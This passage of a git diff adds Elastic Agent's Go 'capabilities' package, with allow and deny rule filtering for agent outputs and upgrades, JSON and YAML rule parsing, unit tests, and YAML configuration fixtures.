initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch", "logstash"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("filters logstash", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "logstash", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("allows logstash only", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &outputCapability{ + Type: "allow", + Output: "logstash", + }, + &outputCapability{ + Type: "deny", + Output: "*", + }, + }, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"logstash"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("allows everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "allow", + Output: "*", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch", "logstash"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("deny everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "*", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("keep format", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "logstash", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch"} + + cap, err := newOutputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + outputs := getOutputs(initialOutputs...) + assert.NotNil(t, outputs) + + res, err := cap.Apply(outputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + ast, ok := res.(*transpiler.AST) + assert.True(t, ok, "expecting an ast") + + outputsIface, found := transpiler.Lookup(ast, outputKey) + assert.True(t, found, "output not found") + + outputsDict, ok := outputsIface.Value().(*transpiler.Dict) + assert.True(t, ok, "expecting a Dict for outputs") + + for _, in := range expectedOutputs { + var typeFound bool + nodes := outputsDict.Value().([]transpiler.Node) + for _, outputKeyNode := range nodes { + outputNode, ok := outputKeyNode.(*transpiler.Key).Value().(*transpiler.Dict) + assert.True(t, ok, "output type key not string") + + typeNode, found := outputNode.Find("type") + assert.True(t, found, "type not found") + + typeNodeStr, ok := typeNode.Value().(*transpiler.StrVal) + assert.True(t, ok, "type node not strval") + outputType, ok := typeNodeStr.Value().(string) + assert.True(t, ok, "output type key not string") + if outputType == in { + typeFound = true + break + } + } + + assert.True(t, typeFound, fmt.Sprintf("output '%s' type key not found", in)) + } + }) + + t.Run("unknown action", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "logstash", + }}, + } + + cap, err := newOutputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{} + outAfter, err := cap.Apply(apiAction) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) +} + +func TestOutput(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("invalid rule", func(t *testing.T) { + r := &upgradeCapability{} + cap, err := newOutputCapability(l, r, tr) + assert.NoError(t, err, "no error expected") + assert.Nil(t, cap, "cap should not be created") + }) + + t.Run("empty eql", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "", + } + cap, err := newOutputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + }) + + t.Run("valid action - 1/1 match", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "logstash", + } + + initialOutputs := []string{"logstash"} + expectedOutputs := []string{"logstash"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) + + t.Run("valid action - 0/1 match", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "elasticsearch", + } + + initialOutputs := []string{"logstash"} + expectedOutputs := []string{"logstash"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) + + t.Run("valid action - deny logstash", func(t *testing.T) { + r := &outputCapability{ + Type: "deny", + Output: "logstash", + } + + initialOutputs := []string{"logstash", "elasticsearch"} + expectedOutputs := []string{"elasticsearch"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) + + t.Run("valid action - multiple outputs 1 explicitely allowed", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "logstash", + } + + initialOutputs := []string{"logstash", "elasticsearch"} + expectedOutputs := []string{"logstash", "elasticsearch"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) +} + +func runMultiOutputTest(t *testing.T, l *logger.Logger, rd *ruleDefinitions, expectedOutputs []string, initialOutputs []string) { + tr := &testReporter{} + cap, err := newOutputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + cfg := getOutputsMap(initialOutputs...) + assert.NotNil(t, cfg) + + outAfter, err := cap.Apply(cfg) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := outAfter.(map[string]interface{}) + assert.True(t, ok, "out ast should be a map") + assert.NotNil(t, newMap) + + outputsNode, found := newMap[outputKey] + assert.True(t, found, "outputs not found") + + outputsList, ok := outputsNode.(map[string]interface{}) + assert.True(t, ok, "outputs not a list") + + typesMap := make(map[string]bool) + for _, nodeIface := range outputsList { + node, ok := nodeIface.(map[string]interface{}) + if !ok { + continue + } + + typeNode, ok := node["type"] + if !ok { + continue + } + + outputType, ok := typeNode.(string) + if !ok { + continue + } + typesMap[outputType] = true + } + + assert.Equal(t, len(expectedOutputs), len(typesMap)) + for _, ei := range expectedOutputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func runOutputTest(t *testing.T, l *logger.Logger, r *outputCapability, expectedOutputs []string, initialOutputs []string) { + tr := &testReporter{} + cap, err := newOutputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + outputs := getOutputsMap(initialOutputs...) + assert.NotNil(t, outputs) + + newMap, err := cap.Apply(outputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + outputsNode, found := newMap[outputKey] + assert.True(t, found, "outputs not found") + + outputsList, ok := outputsNode.(map[string]interface{}) + assert.True(t, ok, "outputs not a map") + + typesMap := make(map[string]bool) + for _, nodeIface := range outputsList { + node, ok := nodeIface.(map[string]interface{}) + if !ok { + continue + } + + typeNode, ok := node[typeKey] + if !ok { + continue + } + + outputType, ok := typeNode.(string) + if !ok { + continue + } + + conditionNode, ok := node[conditionKey] + if !ok { + // was not allowed nor denied -> allowing + typesMap[outputType] = true + continue + } + + isAllowed, ok := conditionNode.(bool) + if !ok { + assert.Fail(t, fmt.Sprintf("condition should be bool but it's not for output '%s'", outputType)) + continue + } + + if isAllowed { + typesMap[outputType] = true + } + } + + assert.Equal(t, len(expectedOutputs), len(typesMap)) + for _, ei := range expectedOutputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func getOutputs(tt ...string) *transpiler.AST { + astMap := getOutputsMap(tt...) + ast, _ := transpiler.NewAST(astMap) + return ast +} + +func getOutputsMap(tt ...string) map[string]interface{} { + cfgMap := make(map[string]interface{}) + outputs := make(map[string]interface{}) + + for i, t := range tt { + outputs[fmt.Sprintf("id%d", i)] = map[string]interface{}{ + "type": t, + "hosts": []string{"testing"}, + } + } + + cfgMap[outputKey] = outputs + return cfgMap +} diff --git a/x-pack/elastic-agent/pkg/capabilities/rule.go b/x-pack/elastic-agent/pkg/capabilities/rule.go new file mode 100644 index 000000000000..93a28067a646 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/rule.go @@ -0,0 +1,112 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "encoding/json" + "fmt" + + "gopkg.in/yaml.v2" +) + +const ( + allowKey = "allow" + denyKey = "deny" + conditionKey = "__condition__" +) + +type ruler interface { + Rule() string +} + +type capabilitiesList []ruler + +type ruleDefinitions struct { + Version string `yaml:"version" json:"version"` + Capabilities capabilitiesList `yaml:"capabilities" json:"capabilities"` +} + +func (r *capabilitiesList) UnmarshalJSON(p []byte) error { + var tmpArray []json.RawMessage + + err := json.Unmarshal(p, &tmpArray) + if err != nil { + return err + } + + for i, t := range tmpArray { + mm := make(map[string]interface{}) + if err := json.Unmarshal(t, &mm); err != nil { + return err + } + + if _, found := mm["input"]; found { + cap := &inputCapability{} + if err := json.Unmarshal(t, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["output"]; found { + cap := &outputCapability{} + if err := json.Unmarshal(t, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["upgrade"]; found { + cap := &upgradeCapability{} + if err := json.Unmarshal(t, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + } else { + return fmt.Errorf("unexpected capability type for definition number '%d'", i) + } + } + + return nil +} + +func (r *capabilitiesList) UnmarshalYAML(unmarshal func(interface{}) error) error { + var tmpArray []map[string]interface{} + + err := unmarshal(&tmpArray) + if err != nil { + return err + } + + for i, mm := range tmpArray { + partialYaml, err := yaml.Marshal(mm) + if err != nil { + return err + } + if _, found := mm["input"]; found { + cap := &inputCapability{} + if err := yaml.Unmarshal(partialYaml, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["output"]; found { + cap := &outputCapability{} + if err := yaml.Unmarshal(partialYaml, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["upgrade"]; found { + cap := &upgradeCapability{} + if err := yaml.Unmarshal(partialYaml, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + } else { + return fmt.Errorf("unexpected capability type for definition number '%d'", i) + } + } + + return nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/rule_test.go b/x-pack/elastic-agent/pkg/capabilities/rule_test.go new file mode 100644 index 000000000000..5f3bab860bf3 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/rule_test.go @@ -0,0 +1,122 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "encoding/json" + "reflect" + "testing" + + "github.com/stretchr/testify/assert" + "gopkg.in/yaml.v2" +) + +func TestUnmarshal(t *testing.T) { + t.Run("valid json", func(t *testing.T) { + rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + + err := json.Unmarshal(jsonDefinitionValid, &rr) + + assert.Nil(t, err, "no error is expected") + assert.Equal(t, 3, len(rr.Capabilities)) + assert.Equal(t, "*capabilities.upgradeCapability", reflect.TypeOf(rr.Capabilities[0]).String()) + assert.Equal(t, "*capabilities.inputCapability", reflect.TypeOf(rr.Capabilities[1]).String()) + assert.Equal(t, "*capabilities.outputCapability", reflect.TypeOf(rr.Capabilities[2]).String()) + }) + + t.Run("invalid json", func(t *testing.T) { + var rr ruleDefinitions + + err := json.Unmarshal(jsonDefinitionInvalid, &rr) + + assert.Error(t, err, "error is expected") + }) + + t.Run("valid yaml", func(t *testing.T) { + rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + + err := yaml.Unmarshal(yamlDefinitionValid, &rr) + + assert.Nil(t, err, "no error is expected") + assert.Equal(t, 3, len(rr.Capabilities)) + assert.Equal(t, "*capabilities.upgradeCapability", reflect.TypeOf(rr.Capabilities[0]).String()) + assert.Equal(t, "*capabilities.inputCapability", reflect.TypeOf(rr.Capabilities[1]).String()) + assert.Equal(t, "*capabilities.outputCapability", reflect.TypeOf(rr.Capabilities[2]).String()) + }) + + t.Run("invalid yaml", func(t *testing.T) { + var rr ruleDefinitions + + err := yaml.Unmarshal(yamlDefinitionInvalid, &rr) + + assert.Error(t, err, "error is expected") + }) +} + +var jsonDefinitionValid = []byte(`{ +"capabilities": [ + { + "upgrade": "${version} == '8.0.0'", + "rule": "allow" + }, + { + "input": "system/metrics", + "rule": "allow" + }, + { + "output": "elasticsearch", + "rule": "allow" + } +] +}`) + +var jsonDefinitionInvalid = []byte(`{ +"capabilities": [ + { + "upgrade": "${version} == '8.0.0'", + "rule": "allow" +}, +{ + "input": "system/metrics", + "rule": "allow" +}, +{ + "output": "elasticsearch", + "rule": "allow" +}, +{ + "ayay": "elasticsearch", + "rule": "allow" +} +] +}`) + +var yamlDefinitionValid = []byte(`capabilities: +- + rule: "allow" + upgrade: "${version} == '8.0.0'" +- + input: "system/metrics" + rule: "allow" +- + output: "elasticsearch" + rule: "allow" +`) + +var yamlDefinitionInvalid = []byte(` +capabilities: +- + rule: allow + upgrade: "${version} == '8.0.0'" +- + input: "system/metrics" + rule: allow +- + output: elasticsearch + rule: allow +- + ayay: elasticsearch + rule: allow +`) diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-capabilities.yml new file mode 100644 index 000000000000..408be363fc65 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-capabilities.yml @@ -0,0 +1,6 @@ +version: 0.1.0 +capabilities: +- rule: allow + input: system/metrics +- rule: deny + input: "*" diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-result.yml new file mode 100644 index 000000000000..cf9d47856084 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-result.yml @@ -0,0 +1,14 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-capabilities.yml new file mode 100644 index 000000000000..47722d814ed0 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-capabilities.yml @@ -0,0 +1,4 @@ +version: 0.1.0 +capabilities: +- rule: deny + input: system/logs diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-result.yml new file mode 100644 index 000000000000..cf9d47856084 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-result.yml @@ -0,0 +1,14 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-capabilities.yml new file mode 100644 index 000000000000..a93e0ffcdb1c --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-capabilities.yml @@ -0,0 +1,4 @@ +version: 0.1.0 +capabilities: +- rule: allow + input: system/metrics diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-result.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-result.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-capabilities.yml new file mode 100644 index 000000000000..408be363fc65 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-capabilities.yml @@ -0,0 +1,6 @@ +version: 0.1.0 +capabilities: +- rule: allow + input: system/metrics +- rule: deny + input: "*" diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-config.yml new file mode 100644 index 000000000000..2133ceac288e --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-config.yml @@ -0,0 +1,18 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-capabilities.yml new file mode 100644 index 000000000000..13ebde75da08 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-capabilities.yml @@ -0,0 +1,4 @@ +version: 0.1.0 +capabilities: +- rule: allow + output: kafka diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-config.yml new file mode 100644 index 000000000000..e648faeae2ff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-config.yml @@ -0,0 +1,19 @@ +outputs: + default: + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-result.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-result.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/upgrade.go b/x-pack/elastic-agent/pkg/capabilities/upgrade.go new file mode 100644 index 000000000000..4ca6f9074d4b --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/upgrade.go @@ -0,0 +1,191 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "strings" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/eql" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +const ( + versionKey = "version" + sourceURIKey = "source_uri" +) + +// NewUpgradeCapability creates capability filter for upgrade. +// Available variables: +// - version +// - source_uri +func newUpgradesCapability(log *logger.Logger, rd *ruleDefinitions, reporter status.Reporter) (Capability, error) { + if rd == nil { + return &multiUpgradeCapability{caps: []*upgradeCapability{}}, nil + } + + caps := make([]*upgradeCapability, 0, len(rd.Capabilities)) + + for _, r := range rd.Capabilities { + c, err := newUpgradeCapability(log, r, reporter) + if err != nil { + return nil, err + } + + if c != nil { + caps = append(caps, c) + } + } + + return &multiUpgradeCapability{log: log, caps: caps}, nil +} + +func newUpgradeCapability(log *logger.Logger, r ruler, reporter status.Reporter) (*upgradeCapability, error) { + cap, ok := r.(*upgradeCapability) + if !ok { + return nil, nil + } + + cap.Type = strings.ToLower(cap.Type) + if cap.Type != allowKey && cap.Type != denyKey { + return nil, fmt.Errorf("'%s' is not a valid type 'allow' and 'deny' are supported", cap.Type) + } + + // if eql definition is not supported make a global rule + if len(cap.UpgradeEqlDefinition) == 0 { + cap.UpgradeEqlDefinition = "true" + } + + eqlExp, err := eql.New(cap.UpgradeEqlDefinition) + if err != nil { + return nil, err + } + + cap.upgradeEql = eqlExp + cap.log = log + cap.reporter = reporter + return cap, nil +} + +type upgradeCapability struct { + log *logger.Logger + reporter status.Reporter + Name string `json:"name,omitempty" yaml:"name,omitempty"` + Type string `json:"rule" yaml:"rule"` + // UpgradeEql is eql expression defining upgrade + UpgradeEqlDefinition string `json:"upgrade" yaml:"upgrade"` + + upgradeEql *eql.Expression +} + +func (c *upgradeCapability) Rule() string { + return c.Type +} + +func (c *upgradeCapability) name() string { + if c.Name != "" { + return c.Name + } + + t := "A" + if c.Type == denyKey { + t = "D" + } + + // e.g UA(*) or UD(7.*.*) + c.Name = fmt.Sprintf("U%s(%s)", t, c.UpgradeEqlDefinition) + return c.Name +} + +// Apply supports upgrade action or fleetapi upgrade action object. +func (c *upgradeCapability) Apply(upgradeMap map[string]interface{}) (map[string]interface{}, error) { + // if eql is not parsed or defined skip + if c.upgradeEql == nil { + return upgradeMap, nil + } + + // create VarStore out of map + varStore, err := transpiler.NewAST(upgradeMap) + if err != nil { + c.log.Errorf("failed creating a varStore for capability '%s': %v", c.name(), err) + return upgradeMap, nil + } + + isSupported, err := c.upgradeEql.Eval(varStore) + if err != nil { + c.log.Errorf("failed evaluating eql formula for capability '%s': %v", c.name(), err) + return upgradeMap, nil + } + + // if deny switch the logic + if c.Type == denyKey { + isSupported = !isSupported + c.log.Errorf("upgrade is blocked out due to capability restriction '%s'", c.name()) + c.reporter.Update(status.Degraded) + } + + if !isSupported { + return upgradeMap, ErrBlocked + } + + return upgradeMap, nil +} + +type multiUpgradeCapability struct { + log *logger.Logger + caps []*upgradeCapability +} + +func (c *multiUpgradeCapability) Apply(in interface{}) (interface{}, error) { + upgradeMap := upgradeObject(in) + if upgradeMap == nil { + c.log.Warnf("expecting map config object but got nil for capability 'multi-outputs'") + // not an upgrade we don't alter origin + return in, nil + } + + for _, cap := range c.caps { + // upgrade does not modify incoming action + _, err := cap.Apply(upgradeMap) + if err != nil { + return in, err + } + } + + return in, nil +} + +func upgradeObject(a interface{}) map[string]interface{} { + resultMap := make(map[string]interface{}) + if ua, ok := a.(upgradeAction); ok { + resultMap[versionKey] = ua.Version() + resultMap[sourceURIKey] = ua.SourceURI() + return resultMap + } + + if ua, ok := a.(*fleetapi.ActionUpgrade); ok { + resultMap[versionKey] = ua.Version + resultMap[sourceURIKey] = ua.SourceURI + return resultMap + } + + if ua, ok := a.(fleetapi.ActionUpgrade); ok { + resultMap[versionKey] = ua.Version + resultMap[sourceURIKey] = ua.SourceURI + return resultMap + } + + return nil +} + +type upgradeAction interface { + // Version to upgrade to. + Version() string + // SourceURI for download. + SourceURI() string +} diff --git a/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go new file mode 100644 index 000000000000..0dc82ed3507d --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go @@ -0,0 +1,344 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "testing" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +func TestUpgrade(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("invalid rule", func(t *testing.T) { + r := &inputCapability{} + cap, err := newUpgradeCapability(l, r, tr) + assert.NoError(t, err, "no error expected") + assert.Nil(t, cap, "cap should not be created") + }) + + t.Run("empty eql", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "", + }, + }, + } + + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + }) + + t.Run("valid action - version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "${version} == '8.0.0'", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.0.0"} + outAfter, err := cap.Apply(ta) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - deny version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "deny", + UpgradeEqlDefinition: "${version} == '8.0.0'", + }, + }, + } + + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.0.0"} + outAfter, err := cap.Apply(ta) + + assert.Error(t, err, "should fail") + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - deny version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "deny", + UpgradeEqlDefinition: "${version} == '8.*.*'", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + 